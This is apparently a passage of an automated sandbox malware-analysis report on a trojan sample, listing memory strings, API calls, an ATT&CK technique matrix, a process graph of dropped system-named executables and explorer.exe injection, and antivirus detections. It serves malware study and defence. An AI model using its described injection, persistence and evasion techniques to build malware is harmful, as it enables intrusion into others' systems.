                      Source: explorer.exe, 0000000A.00000002.2310836451.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2305204176.0000000000AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd4
                      Source: spoolsv.exe, 00000003.00000002.2179204591.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2157424224.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexeex4
                      Source: explorer.exe, 00000002.00000003.2558426084.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778456507.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerI
                      Source: explorer.exe, 00000002.00000003.2457465614.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager8
                      Source: explorer.exe, 00000002.00000003.2457246476.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2369527153.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerIMEe
                      Source: explorer.exe, 00000002.00000003.2538151708.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndr$
                      Source: explorer.exe, 00000002.00000003.2369527153.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_1
                      Source: explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd;
                      Source: explorer.exe, 00000002.00000003.2879263905.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexe.J
                      Source: file.exe, 00000000.00000002.2196375024.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180315144.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180263690.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndE
                      Source: explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimeor
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager1di
                      Source: explorer.exe, 00000002.00000003.2645055528.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager;
                      Source: explorer.exe, 00000002.00000003.2674296786.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674699181.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager:
                      Source: file.exe, 00000000.00000003.2180239998.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179771060.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179480528.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndZ
                      Source: file.exe, 00000000.00000003.2180239998.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180129037.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180067169.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6main
                      Source: explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimeIMB
                      Source: explorer.exe, 00000002.00000003.2645055528.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1I
                      Source: explorer.exe, 00000002.00000003.2899779963.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerg
                      Source: explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman3gx<
                      Source: explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndJ
                      Source: explorer.exe, 00000002.00000003.2804919705.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1|
                      Source: explorer.exe, 00000002.00000003.2934542003.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6maincj
                      Source: explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndQ
                      Source: explorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanndowTU
                      Source: explorer.exe, 00000002.00000003.2205277483.00000000009FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manageri
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexer
                      Source: explorer.exe, 0000000A.00000002.2310836451.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2305204176.0000000000AFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman*
                      Source: file.exe, 00000000.00000003.2180564525.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196220111.0000000000A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexe$
                      Source: explorer.exe, 00000002.00000003.2299766057.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager?k
                      Source: explorer.exe, 00000002.00000003.2917955263.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmannter<U
                      Source: svchost.exe, 0000000D.00000002.2386223092.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: spoolsv.exe, 00000005.00000003.2156443154.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2155923767.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2178202863.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndj
                      Source: explorer.exe, 00000002.00000003.2344113748.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managereed
                      Source: file.exe, 00000000.00000002.2196480983.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180129037.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180067169.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanX
                      Source: explorer.exe, 00000002.00000003.2934542003.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2156443154.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2155923767.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman
                      Source: spoolsv.exe, 00000003.00000003.2155259133.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2155311264.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2155029367.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd~\
                      Source: explorer.exe, 00000002.00000003.2778456507.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789160714.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerwndi
                      Source: explorer.exe, 00000002.00000003.2879263905.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerw
                      Source: explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimed
                      Source: explorer.exe, 00000002.00000003.2879263905.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager_1ow3
                      Source: file.exe, 00000000.00000002.2196507249.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180292867.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180129037.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager
                      Source: explorer.exe, 00000002.00000003.2299766057.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager_1ow
                      Source: explorer.exe, 00000002.00000003.2369527153.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager)}
                      Source: explorer.exe, 00000002.00000003.2249423158.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager;Qj
                      Source: explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmannotif
                      Source: explorer.exe, 0000000A.00000003.2305204176.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2310938713.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2305403899.0000000000B1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managery
                      Source: explorer.exe, 00000002.00000003.2558426084.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager17
                      Source: explorer.exe, 00000002.00000003.2606626181.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager13
                      Source: file.exe, 00000000.00000003.2180239998.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180129037.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180067169.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2789028893.00000000009ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanime
                      Source: explorer.exe, 00000002.00000003.2457465614.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager/
                      Source: explorer.exe, 0000000A.00000003.2303701099.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2305116490.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2310999420.0000000000B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP
                      Source: explorer.exe, 00000002.00000003.2344113748.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2271309412.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerlwnd
                      Source: spoolsv.exe, 00000005.00000003.2155923767.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2156048178.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2179107491.00000000007FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerox/
                      Source: explorer.exe, 00000002.00000003.2879263905.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1&
                      Source: explorer.exe, 00000002.00000003.2917955263.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager1ow
                      Source: explorer.exe, 00000002.00000003.2606626181.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager;w
                      Source: file.exe, 00000000.00000002.2196507249.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180292867.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2180129037.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
                      Source: explorer.exe, 00000002.00000003.2457465614.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1!
                      Source: explorer.exe, 00000002.00000003.2457246476.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2393742757.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2411009435.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager&}
                      Source: explorer.exe, 00000002.00000003.2249423158.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1qi
                      Source: explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2879263905.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexerQ
                      Source: explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538151708.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexeork
                      Source: explorer.exe, 00000002.00000003.2299766057.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2624369245.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C950 GetLocalTime,0_2_0042C950
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427CDE EqualSid,GetUserNameA,GetUserNameA,GetUserNameW,OpenProcessToken,OpenThreadToken,RegCloseKey,RegDeleteValueA,RegFlushKey,0_2_00427CDE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428136 GetTimeZoneInformation,0_2_00428136
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042813E GetVersion,0_2_0042813E
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      11
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Windows Service
                      1
                      Windows Service
                      3
                      Obfuscated Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol11
                      Input Capture
                      2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      312
                      Process Injection
                      21
                      Software Packing
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      NTDS15
                      System Information Discovery
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      File Deletion
                      LSA Secrets321
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                      Masquerading
                      Cached Domain Credentials23
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                      Virtualization/Sandbox Evasion
                      DCSync3
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                      Process Injection
                      Proc Filesystem11
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522734 Sample: file.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 47 googlecode.l.googleusercontent.com 2->47 49 codecmd03.googlecode.com 2->49 51 2 other IPs or domains 2->51 65 Antivirus / Scanner detection for submitted sample 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Mofksys 2->69 71 5 other signatures 2->71 10 file.exe 1 3 2->10         started        14 svchost.exe 2->14 injected 16 explorer.exe 2->16         started        18 svchost.exe 2->18         started        signatures3 process4 file5 43 C:\Windows\Resources\Themes\explorer.exe, MS-DOS 10->43 dropped 95 Detected unpacking (changes PE section rights) 10->95 97 Hides threads from debuggers 10->97 99 Drops PE files with benign system names 10->99 101 Contains functionality to detect sleep reduction / modifications 10->101 20 explorer.exe 15 10->20         started        103 Injects code into the Windows Explorer (explorer.exe) 14->103 105 Drops executables to the windows directory (C:\Windows) and starts them 14->105 25 explorer.exe 1 14->25         started        27 svchost.exe 1 14->27         started        29 consent.exe 2 14->29         started        signatures6 process7 dnsIp8 53 108.177.15.82, 49706, 49708, 49716 GOOGLEUS United States 20->53 55 googlecode.l.googleusercontent.com 74.125.206.82, 49705, 49714, 49718 GOOGLEUS United States 20->55 41 C:\Windows\Resources\spoolsv.exe, MS-DOS 20->41 dropped 81 Antivirus detection for dropped file 20->81 83 System process connects to network (likely due to code injection or exploit) 20->83 85 Detected unpacking (changes PE section rights) 20->85 91 2 other signatures 20->91 31 spoolsv.exe 3 20->31         started        87 Hides threads from debuggers 25->87 89 Writes to foreign memory regions 29->89 file9 signatures10 process11 file12 45 C:\Windows\Resources\svchost.exe, MS-DOS 31->45 dropped 57 Antivirus detection for dropped file 31->57 59 Detected unpacking (changes PE section rights) 31->59 61 Machine Learning detection for dropped file 31->61 63 3 other signatures 31->63 35 svchost.exe 2 2 31->35         started        signatures13 process14 signatures15 73 Antivirus detection for dropped file 35->73 75 Detected CryptOne packer 35->75 77 Detected unpacking (changes PE section rights) 35->77 79 4 other signatures 35->79 38 spoolsv.exe 1 35->38         started        process16 signatures17 93 Hides threads from debuggers 38->93

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe74%ReversingLabsWin32.Trojan.Swisyn
                      file.exe100%AviraTR/Patched.Ren.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Windows\Resources\svchost.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\Themes\explorer.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\svchost.exe100%Joe Sandbox ML
                      C:\Windows\Resources\Themes\explorer.exe100%Joe Sandbox ML
                      C:\Windows\Resources\spoolsv.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      googlecode.l.googleusercontent.com
